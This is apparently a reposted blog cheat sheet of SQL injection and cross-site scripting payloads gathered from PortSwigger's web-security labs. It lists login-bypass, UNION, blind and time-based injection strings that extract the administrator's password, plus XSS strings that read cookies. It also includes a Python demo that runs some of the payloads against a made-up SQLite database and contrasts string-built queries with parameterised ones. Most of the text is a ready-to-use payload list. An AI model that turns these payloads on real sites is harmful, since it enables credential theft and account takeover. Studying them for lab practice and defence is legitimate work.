• Vulnerability payloads collected from the Burp (PortSwigger) website


    1. SQL injection

    WHERE clause
    '+OR+1=1--
    Login bypass
    administrator'--
    UNION clause
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    Finding the database type
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    Listing database contents
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    Blind injection (conditional responses)
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    Blind injection (conditional errors)
    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    Time-based blind injection
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
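
    Added example (not from the original post or from PortSwigger): the login-bypass, WHERE-clause and UNION payloads listed above are run against a constructed in-memory SQLite database, once through a query built by string concatenation and once through a parameterised query. The table names, rows and helper functions are assumptions made for this example; the payloads are decoded from the URL-encoded form shown above with unquote_plus.

```python
import sqlite3
from urllib.parse import unquote_plus

# Payloads copied from the list above, in the URL-encoded form Burp sends them.
PAYLOAD_WHERE = "'+OR+1=1--"
PAYLOAD_LOGIN = "administrator'--"
PAYLOAD_UNION = "'+UNION+SELECT+username,+password+FROM+users--"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema and rows (assumption: not from any real application)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-admin-secret');
        INSERT INTO users VALUES ('wiener', 'peter');
        CREATE TABLE products(name TEXT, description TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Gift card', 'A gift card', 'Gifts', 1);
        INSERT INTO products VALUES ('Hidden gadget', 'Not yet on sale', 'Gifts', 0);
        """
    )
    return conn


def products_vulnerable(conn, category: str) -> list:
    """The category is pasted into the SQL text, so a quote in it rewrites the query."""
    sql = (
        "SELECT name, description FROM products "
        f"WHERE category = '{category}' AND released = 1"
    )
    return conn.execute(sql).fetchall()


def products_fixed(conn, category: str) -> list:
    """Parameterised: the value travels separately from the SQL and is never parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()


def login_vulnerable(conn, username: str, password: str):
    """With concatenation, the -- in administrator'-- comments out the password check."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Same check with bound parameters: the quote and comment are just characters."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run each listed payload through the vulnerable and the fixed query."""
    conn = make_db()
    return {
        "where_vuln": products_vulnerable(conn, unquote_plus(PAYLOAD_WHERE)),
        "where_fixed": products_fixed(conn, unquote_plus(PAYLOAD_WHERE)),
        "login_vuln": login_vulnerable(conn, unquote_plus(PAYLOAD_LOGIN), "wrong"),
        "login_fixed": login_fixed(conn, unquote_plus(PAYLOAD_LOGIN), "wrong"),
        "union_vuln": products_vulnerable(conn, unquote_plus(PAYLOAD_UNION)),
        "union_fixed": products_fixed(conn, unquote_plus(PAYLOAD_UNION)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

    Running demo() shows the concatenated queries returning every product (the unreleased one included), the administrator row with a wrong password, and the users table through the UNION, while the parameterised versions return nothing for the same input. SQLite treats -- as a comment to end of line just like the databases used in the labs, so the comment trick in the payloads behaves the same here.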

    2. XSS

    ">

    javascript:alert(document.cookie)

    "onmouseover="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • Original source: https://blog.csdn.net/tainqiuer123/article/details/125887065